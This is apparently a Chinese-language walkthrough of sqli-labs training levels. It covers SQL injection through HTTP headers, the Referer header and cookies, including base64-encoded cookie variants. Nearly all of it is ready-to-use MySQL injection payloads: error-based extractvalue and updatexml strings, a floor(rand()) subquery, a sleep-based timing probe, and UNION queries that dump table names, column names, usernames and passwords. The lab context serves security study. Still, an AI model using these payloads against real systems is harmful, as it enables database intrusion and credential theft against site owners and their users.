爆表: ' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and ' 爆列名: ' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'))) and ' 爆列名: ' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'))) and ' 数据显示不全:(extractvalue最大爆32位) ' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in ('Dumb','Angelinal')))) and '
同理updatexml()注入()
' and updatexml(1,concat('#',(database())),0) and '
注意:这里并不是URL而是HTTP头,所以+并不会被转义为(空格),于是末尾的注释符号要变为#。
数据库: ' or updatexml(1,concat('#',(database())),0),' ',' ')-- # ' and updatexml(1,concat('#',(database())),0),' ',' ')-- # 爆表: ' or updatexml(1,concat('#',(select group_concat(table_name) from information_schema.tables where table_schema='security')),0),'','')# 爆字段 ' and updatexml(1,concat('#',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),0),'','')-- # 爆数据: ' and updatexml(1,concat('#',(select * from (select concat_ws('#',id,username,password) from users limit 0,1) a)),0),'','')-- # 使用limit偏移注入依次爆出其他用户和密码。
子查询注入:
' and (select 1 from (select count(*),concat_ws('-',(select user()),floor(rand()*2))as a from information_schema.tables group by a) b) and '
less-19基于头部的Referer POST报错注入
与上一关基本相似
extractvalue()注入---暴库 ' and extractvalue(1,concat(0x7e,(select database()),0x7e)) and ' updatexml()注入--暴表 ' or updatexml(1,concat('#',(select group_concat(table_name) from information_schema.tables where table_schema='security')),0),'')# ' and updatexml(1,concat('#',(select group_concat(table_name) from information_schema.tables where table_schema='security')),0),'')# 子查询注入---暴字段 ' and (select 1 from(select count(*),concat((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x)a) and ' 延时注入: ' or if(length(database())=8,1,sleep(5)) and '
Cookie: uname=Dumb' order by 4 -- # 回显Unknown column '4' in 'order clause'
Cookie: uname=Dumb' order by 3 -- #
Cookie: uname=D2' union select 1,2,3 #
login name和passwd这里有回显
数据库: Cookie: uname=1' union select 1,2,database() -- # 暴表: uname=1' union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='security' -- # 暴字段: uname=1' union select 1,2,group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users' -- #' 暴数据:(这两种其实是一样的) uname=1' union select 1,2,group_concat(username,0x7e,password)from security.users -- # uname=1' union select 1,2,group_concat(concat_ws('-',id,username,password)) from users# -- #
less-21基于base64编码单引号和括号的Cookie注入
发现cookie进行了base64编码 RHVtYg== base64解码后:Dumb
Dumb' or 1=1 --+ 编码后RHVtYicgb3IgMT0xICM=
回显sql语句错误
Dumb') order by 4-- # 编码RHVtYicpIG9yZGVyIGJ5IDQtLSAj
Dumb') order by 3-- # 编码 RHVtYicpIG9yZGVyIGJ5IDMtLSAj
1') union select 1,2,3-- # 编码MScpIHVuaW9uIHNlbGVjdCAxLDIsMy0tICM=
less-22基于错误的双引号字符型Cookie注入
除了多个”闭合其他和上一关基本一致
1" or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))-- # 编码 MSIgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpKSwweDdlKSktLSAj
微信
支付宝
